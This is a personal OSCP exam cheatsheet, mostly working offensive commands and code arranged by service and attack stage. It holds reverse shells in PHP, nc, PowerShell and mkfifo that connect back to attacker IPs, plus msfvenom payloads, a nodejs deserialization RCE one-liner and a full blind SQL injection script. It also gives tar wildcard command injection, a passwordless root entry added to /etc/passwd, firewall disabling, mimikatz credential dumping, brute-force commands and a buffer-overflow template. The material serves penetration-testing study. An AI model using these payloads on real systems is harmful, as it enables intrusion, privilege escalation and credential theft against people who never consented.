###### tags: `oscp` # OSCP Cheatsheet ## Port Enumeration ### AutoRecon https://github.com/Tib3rius/AutoRecon ``` sudo autorecon <ip> ``` ### Nmap #### Scan host ``` nmap -sn 192.168.56.1-255 ``` #### Initial Scan for Top 1000 port with service info and default script ``` nmap --top-ports=1000 -v -sV -sC -Pn 10.2.2.23 --open ``` #### Full scan ``` nmap -p- -v -sV -sC -Pn 10.2.2.23 --open ``` #### UDP scan ## TCP Service Enumeration ### FTP (21) #### Anonymous login ``` use anonymous username and null password to login ``` #### FTP connect using username and password ``` ftp -n ip port_number ftp> user username 331 Password required for username Password: ``` ### FTP list directory ``` ftp> ls ``` ### FTP download file #### single file ``` ftp> get filename ``` #### multiple files ``` ftp> mget filename1 filename2 ... ``` ### SSH (22) #### OpenSSH 4.3p2 Debian 9 (protocol 2.0) https://github.com/CptGibbon/CVE-2021-3156 ### SMTP (25) #### shellshock https://github.com/3mrgnc3/pentest_old/blob/master/postfix-shellshock-nc.py ### HTTP (80) #### Web vulnerability scan ``` nikto -h url nmap --script http-vuln-* -p 80 <ip> ``` #### Scan web directory ``` dirb <url> dirsearch -u <url> -w <dictionary_path> -t 8 #dirsearch for specific extension dirsearch -u <url> -w <dictionary_path> -t 8 -e php,html -f ``` #### Check robots.txt #### weak credential ``` admin:admin ``` #### Shellshock (php < 5.6.2) https://www.exploit-db.com/exploits/35146 #### Use hydra to bruteforce username log: POST parameter F: Consider an attempt as a failure (F) if the response contains the text ```python= hydra -L <username_list> -p <password> <ip> -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username' ``` #### use hydra to bruteforce password ```python= hydra -l <username> -P <password_list> <ip> -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect' ``` #### bypass image file upload limitation 1. append GIF89a; at the beginning of reverse shell 2. add double extension gif #### nodejs express cookie unserialization ```python= for p in $(msfvenom -p nodejs/shell_reverse_tcp lhost=192.168.56.102 lport=443 -f raw 2>/dev/null | grep -o .|sed 's/.*/x&x/'); do if [ "$p" == "x" ]; then echo -n "32,"; else printf "%d," "'${p:1:1}" ; fi; done | sed 's/.*/{"rce":"_$$ND_FUNC$$_function (){ eval(String.fromCharCode(&32))}()"}/' | base64 -w0 ``` #### SQL injection - **Useful payload** ``` home' AND 1=1 AND 'dog'='dog -7417\')/**/OR/**/7305=7305/**/AND/**/(\'TKQo\'/**/LIKE/**/\'TKQo ``` - **Time-based injection script** :::spoiler python script ```python= import requests import time #SELECT 8232 FROM (SELECT(SLEEP(5)))UXlp def sendpost(payload): headers = {'User-Agent': payload,'Content-Type':'application/x-www-form-urlencoded'} datas = 'user=dog&pass=dog' http_proxy = "http://192.168.56.102:31337" proxyDict = { "http": http_proxy } start_time = time.time() r = requests.post('http://pinkys-palace:8080/littlesecrets-main/login.php',data=datas,headers=headers,proxies=proxyDict) return time.time() - start_time # database() length 12 ''' for i in range(1,20): payload = f"123' AND (IF(length(database())={i},sleep(5),1)=1) AND 'mSPZ'='mSPZ" start_time = time.time() sendpost(payload) if time.time() - start_time > 1.0: print(i) break ''' # database() = pinky_sec_db ''' database = "" index = 0 for i in range(12,13): print(i) low = 0 high = 122 mid = 0 while low <= high: mid = (low + high) // 2 print(mid) payload = f"123' AND (IF(ascii(mid((database()),{i},1))={mid},sleep(1),1)=1) AND 'mSPZ'='mSPZ" if sendpost(payload) > 0.5: break payload = f"123' AND (IF(ascii(mid((database()),{i},1))>{mid},sleep(1),1)=1) AND 'mSPZ'='mSPZ" if sendpost(payload) > 0.5: low = mid + 1 else: high = mid - 1 database += chr(mid) print(database) ''' # table 0 logs # table 1 users ''' table = "" index = 1 for i in range(1,7): print(i) low = 0 high = 122 mid = 0 while low <= high: mid = (low + high) // 2 print(mid) payload = f"123' AND (IF(ascii(mid((select table_name from information_schema.tables where table_schema='pinky_sec_db' limit {index},1), {i}, 1))={mid},sleep(1),1)=1) AND 'mSPZ'='mSPZ" if sendpost(payload) > 0.5: break payload = f"123' AND (IF(ascii(mid((select table_name from information_schema.tables where table_schema='pinky_sec_db' limit {index},1), {i}, 1))>{mid},sleep(1),1)=1) AND 'mSPZ'='mSPZ" if sendpost(payload) > 0.5: low = mid + 1 else: high = mid - 1 table += chr(mid) print(table) ''' # column 0 uid # column 1 user # column 2 pass ''' column = "" index = 2 for i in range(1,8): print(i) low = 0 high = 122 mid = 0 while low <= high: mid = (low + high) // 2 print(mid) payload = f"123' AND (IF(ascii(mid((select column_name from information_schema.columns where table_name='users' limit {index},1), {i}, 1))={mid},sleep(1),1)=1) AND 'mSPZ'='mSPZ" if sendpost(payload) > 0.5: break payload = f"123' AND (IF(ascii(mid((select column_name from information_schema.columns where table_name='users' limit {index},1), {i}, 1))>{mid},sleep(1),1)=1) AND 'mSPZ'='mSPZ" if sendpost(payload) > 0.5: low = mid + 1 else: high = mid - 1 column += chr(mid) print(column) ''' # user 0 pinky # user 1 pinkymanage ''' user = "" index = 1 for i in range(10,13): print(i) low = 0 high = 122 mid = 0 while low <= high: mid = (low + high) // 2 print(mid) payload = f"123' AND (IF(ascii(mid((select user from users limit {index},1), {i}, 1))={mid},sleep(1),1)=1) AND 'mSPZ'='mSPZ" if sendpost(payload) > 0.5: break payload = f"123' AND (IF(ascii(mid((select user from users limit {index},1), {i}, 1))>{mid},sleep(1),1)=1) AND 'mSPZ'='mSPZ" if sendpost(payload) > 0.5: low = mid + 1 else: high = mid - 1 user += chr(mid) print(user) ''' # pass 0 f543dbfeaf238729831a321c7a68bee4 # pass 1 d60dffed7cc0d87e1f4a11aa06ca73af ''' password = "" index = 0 for i in range(1,34): print(i) low = 0 high = 122 mid = 0 while low <= high: mid = (low + high) // 2 print(mid) payload = f"123' AND (IF(ascii(mid((select pass from users limit {index},1), {i}, 1))={mid},sleep(1),1)=1) AND 'mSPZ'='mSPZ" if sendpost(payload) > 0.5: break payload = f"123' AND (IF(ascii(mid((select pass from users limit {index},1), {i}, 1))>{mid},sleep(1),1)=1) AND 'mSPZ'='mSPZ" if sendpost(payload) > 0.5: low = mid + 1 else: high = mid - 1 password += chr(mid) print(password) ''' ``` ::: #### Wordpress - **Wordpress reverse shell upload** replace 404.php to reverse shell and then access 404.php Appearance->editor->404.php - **wpscan scan** ``` wpscan --url <url> --enumerate ap,at,cb,dbe ``` - **Use wpscan to enumerate username** ``` wpscan --url <url> --enumerate u ``` - **Use wpscan to crack password** ``` wpscan --url <url> --passwords <passwordlist> --usernames <username> ``` - **use hydra to crack password** ``` hydra -l username -P passwordlist ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In:S=Location' ``` ### SMB (139,445) #### find vulnerability in SMB ``` nmap --script smb-vuln* -p 139,445 $ip ``` #### ms08-067 script https://github.com/andyacer/ms08_067 #### ms17-010 script https://www.exploit-db.com/exploits/42315 metaspoit: windows/smb/ms17_010_psexec #### open smb server ``` sudo python3 smbserver.py ROPNOP <dir> ``` #### open smbv2 server ``` sudo python3 smbserver.py -smb2support -username john -password john ROPNOP <dir> ``` #### download file from smbv2 server ``` net use x: \\192.168.119.131\ROPNOP /user:john john # disconnect from share net use x: /d ``` #### check smb version Need to modify tap0 to correct interface. ``` #!/bin/sh #Author: rewardone #Description: # Requires root or enough permissions to use tcpdump # Will listen for the first 7 packets of a null login # and grab the SMB Version #Notes: # Will sometimes not capture or will print multiple # lines. May need to run a second time for success. if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi if [ ! -z $2 ]; then rport=$2; else rport=139; fi tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " & echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null echo "" && sleep .1 ``` #### Samba < 2.2.8 (Linux/BSD) https://www.exploit-db.com/exploits/10 #### Samba 3.4.5 https://www.exploit-db.com/exploits/33599 #### Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 https://www.exploit-db.com/exploits/42084 ### MSSQL (1443) #### master.mdf location ``` C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\Backup\master.mdf C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\Binn\Templates\master.mdf C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\Template Data\master.mdf # DOS 8.3 filename /PROGRA~1/MICROS~1/MSSQL14.SQLEXPRESS/MSSQL/TEMPLA~1/master.mdf /PROGRA~1/MICROS~1/MSSQL1~1.SQL/MSSQL/Binn/Templates/master.mdf /PROGRA~1/MICROS~1/MSSQL14.SQLEXPRESS/MSSQL/Backup/master.mdf ``` #### Get-MDFHashes Extract hash from master.mdf. pwsh can run the script. https://github.com/xpn/Powershell-PostExploitation/tree/master/Invoke-MDFHashes #### xp_cmdshell ``` #this turns on advanced options and is needed to configure xp_cmdshell sp_configure 'show advanced options', '1' RECONFIGURE #this enables xp_cmdshell sp_configure 'xp_cmdshell', '1' RECONFIGURE #Quickly check what the service account is via xp_cmdshell EXEC master..xp_cmdshell 'whoami' ``` ### NFS (2049) #### nmap script to showmount ```python= nmap -p111 --script=nfs-showmount <ip> ``` #### showmount to list exposed NFS shares ```python= showmount -e <ip> ``` #### mount nfs to local directory ```python= sudo mount -t nfs -o vers=3 <ip>:<target_directory> <your_directory> ``` #### mount nfs by nfspy without creating new uid and gid ```python= sudo nfspy -o server=<ip>:<target_directory>,hide,allow_other,rw,intr <your_directory> ``` #### show directory owner ```python= ls -ld <directory> ``` #### umount directory ```python= sudo fusermount -u <directory> ``` ### Mysql (3306) #### local login with password ```python= mysql -u root -p ``` #### remote login with password ```python= mysql -u root -p -h ip ``` #### view all databases ```python= show databases; ``` #### use specific database ```python= use database_name; ``` #### MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2) https://www.exploit-db.com/exploits/1518 ### RDP (3389) #### login ``` rdesktop -d <domain> -u <username> -p <password> <ip> -5 -K -r clipboard:CLIPBOARD ``` ## UDP service enumeration ### TFTP (69) #### connect ``` tftp <ip> <port> ``` #### command ``` connect:連接到遠程tftp服務器 mode:文件傳輸模式 put:上傳文件 get:下載文件 quit:退出 verbose:顯示詳細的處理信息 tarce:顯示包路徑 status:顯示當前狀態信息 binary:二進制傳輸模式 ascii:ascii 傳送模式 rexmt:設置包傳輸的超時時間 timeout:設置重傳的超時時間 ``` ## File Transfer ### nc send file in windows ``` type result | .\nc64.exe -w 3 <ip> <port> ``` ### curl ``` curl -O http://192.168.0.101/file.txt ``` ### python http server ``` sudo python3 -m http.server 8080 ``` ## Port fowarding ### SSH ``` ssh -f -N -D 9050 <user>@<ip> ``` ### Proxychains Can have multiple proxies /etc/proxychains.conf ``` socks5 127.0.0.1 9050 ``` ## Reverse shell ### php Complete reverse shell https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php Simple reverse shell ```php= <?php $sock=fsockopen("192.168.56.1",8888);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?> php -r '$sock=fsockopen("ip",5566);exec("/bin/sh -i <&3 >&3 2>&3");' ``` ### nc ``` nc -e /bin/sh <ip> <port> ``` ### listen to reverse sehll ``` nc -nlvp port ``` ### spawning tty shell ``` python -c 'import pty; pty.spawn("/bin/sh")' perl -e 'exec "/bin/sh";' ``` ### cleanup double characters ``` stty raw -echo ``` ### Word macro - Make payload using msfvenom ``` msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f vba-psh ``` - Put payload in ThisDocument ![](https://s3.us-west-2.amazonaws.com/secure.notion-static.com/217a8fd9-c151-48c6-82c2-af625b8d6855/Untitled.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAT73L2G45O3KS52Y5%2F20211009%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20211009T135828Z&X-Amz-Expires=86400&X-Amz-Signature=494259cb89c0a8e80ad25b968c10870c0c8e658e9e836cfb96d32681c5efa415&X-Amz-SignedHeaders=host&response-content-disposition=filename%20%3D%22Untitled.png%22) - Close antivirus to save file ### powershell ``` powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" ``` ### msfvenom #### windows x86 exe ``` msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe ``` #### hta ``` msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f hta-psh > shell.hta ``` ## Hash decrypt ### password hash type identify ``` hash-identifier ``` ### md5 hash decrypt http://www.md5decrypt.org/ ### linux password decrypt sha512 with salt ``` hashcat -m 1800 test.txt -o cracked.txt /usr/share/wordlists/rockyou.txt ``` phpass (start with `$P$`) ``` hashcat -m 400 test.txt -o cracked.txt /usr/share/wordlists/rockyou.txt ``` ## Linux Privilege Escalation ### check privilege escalation command ``` sudo -l ``` ### privilege escalation enumeration script https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS ### binaries have SUID set https://gtfobins.github.io/ ### impersonate binary file 1. compile file that can spawn shell such as ```c= #include<stdio.h> #include<stdlib.h> int main(){ system("/bin/sh"); return 0; } ``` 2. chmod 777 file 3. add directory to path ```python= export PATH="/directory:$PATH" ``` ### crontab tar wildcard injection 1. crontab such as ```python= */1 * * * * root /etc/cron.daily/backup bob@linsecurity:~$ cat /etc/cron.daily/backup #!/bin/bash for i in $(ls /home); do cd /home/$i && /bin/tar -zcf /etc/backups/home-$i.tgz *; done ``` 2. create three files ```python= echo "mkfifo /tmp/knbzq; nc 192.168.56.1 8888 0</tmp/knbzq | /bin/sh >/tmp/knbzq 2>&1; rm /tmp/knbzq" > shell.sh && chmod +x shell.sh echo "" > "--checkpoint-action=exec=sh shell.sh" echo "" > --checkpoint=1 ``` 3. use nc listener to receive reverse shell ```python= $ nc -lvp 8888 ``` ### hash in /etc/passwd 1. use hash-identifier to identify hash type 2. use hashcat to decrypt it 3. su to that user ### find useful files in web directory ### find file with specific name ``` find / -name filename 2>/dev/null ``` ### writable /etc/passwd ``` echo "root::0:0:root:/root:/bin/bash" >> /etc/passwd tail -n +2 /etc/passwd > /tmp/bak_up cat /tmp/bak_up > /etc/passwd su ``` ### sudo version <= 1.8.31 https://github.com/CptGibbon/CVE-2021-3156 ### Linux Kernel 2.6.22 < 3.9 Dirty Cow https://www.exploit-db.com/exploits/40839 ### Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) https://www.exploit-db.com/exploits/45010 ## Windows Privilege Escalation ### privilege escalation enumeration script #### Winpeasx64.exe #### PrivsecCheck.ps1 ``` Set-ExecutionPolicy Bypass -Scope process -Force . .\PrivescCheck.ps1; Invoke-PrivescCheck ``` ### Windows add administrator user ``` net user john john /add net localgroup Administrators john /add ``` ### JuicyPotato Does not work for Windows Server 2019 and Windows 10 versions 1809 and higher Affected version ``` Windows 7 Enterprise Windows 8.1 Enterprise Windows 10 Enterprise Windows 10 Professional Windows Server 2008 R2 Enterprise Windows Server 2012 Datacenter Windows Server 2016 Standard ``` https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/juicypotato ### Windows XP SP0/SP1 https://sohvaxus.github.io/content/winxp-sp1-privesc.html ### Writable service exe Replace exe with reverse shell. Restart machine. ### Microsoft Windows 10 Build 1803 < 1903 COMahawk https://www.exploit-db.com/exploits/47684 ### Check service running privilege ``` sc.exe qc <service_name> ``` ### Extract user hash from SAM.OLD and SYSTEM.OLD ``` samdump2 -d -o password SYSTEM.OLD SAM.OLD ``` ## Other get shell method ### copy ssh public key into authorized_keys then ssh without password ```python= cp ~/.ssh/id_rsa.pub vulnix/.ssh/authorized_keys ``` ### when ssh get filtered and there is a proxy service ```python= 1. add proxy information in /etc/proxychains.conf 2. ssh through proxychains (-t for tty shell and /bin/sh for command, these can be omitted) proxychains ssh -t john@192.168.56.101 /bin/sh ``` ### ssh with key file ```python= $ ssh -i id_rsa pinky@192.168.56.102 -p 64666 ``` ## BOF ### test buffer length ```python= import socket victim = '127.0.0.1' port = 9999 junk = "\x41"*1000 payload = junk s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print("Connect to victim") s.connect((victim, port)) s.recv(1024) print("Send payload") s.send(payload) print("Done") ``` ### create pattern to check EIP offset ```python= msf-pattern_create -l <length> ``` ### check EIP value in Immunity Debugger ### check pattern offset ```python= msf-pattern_offset -l <length> -q <offset> ``` ### find ROPgadget #### ROPgadget ```python= ROPgadget --binary <binary> | grep 'jmp esp' ``` #### Immunity Debugger ``` !mona find -s "\xff\xe4" -m "<binary or dll>" ``` ### Check bad chars ``` badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" ) ``` ### generate reverse shell payload #### windows ``` msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -e x86/shikata_ga_nai -f python -b '\x00<other bad chars>' ``` #### linux ``` msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -e x86/shikata_ga_nai -f python -b '\x00<other bad chars>' ``` ### set breakpoint Press F2 ### single step Press F7 ### final payload ``` "A" * <pattern_offset> + <jmp esp address> + "B" * <offset_to_esp> + "\x90"*10 + <shellcode> ``` ### use objdump to view assembly ``` objdump -M intel -d filename ``` ## Linux tricks ### Escape restricted shell ``` python -c 'import pty;pty.spawn("/bin/sh")' ``` ### frackzip -v: verbose -u: 用unzip來判斷有沒有解對 -D: 使用dictionary -p: use string as initial password/file,看不太懂,但不加解不出來XD ``` fcrackzip -v -u -D -p passwordlist zipfilename ``` ### image forensic #### exiftool ``` exiftool imagename ``` ## Windows tricks ### Close firewall ``` NetSh Advfirewall set allprofiles state off ``` ### Check firewall rule ``` netsh advfirewall firewall show rule name=all dir=out type=dynamic ``` ### mimikatz #### lists all available provider credentials ``` privilege::debug sekurlsa::logonpasswords ``` ### Login with hash #### pth-winexe #### evil-winrm ``` evil-winrm -i <ip> -u <user> -p <password> evil-winrm -i <ip> -u <user> --hash <nt_hash> ``` ## smtp ### user enumeration ```python= ./smtp-user-enum.pl -M VRFY -U ../unix_users.txt -t 192.168.56.105 ``` ## finger ### user enumeration ```python= ./finger-user-enum.pl -U ../unix_users.txt -t 192.168.56.105 ``` ## knockd When the server detects a specific sequence of port-hits, it runs a command defined in its configuration file ``` sudo knock ip port_sequence ``` ## Kerberoasting ### video https://www.youtube.com/watch?v=beRDcvBwTBw ### script https://github.com/nidem/kerberoast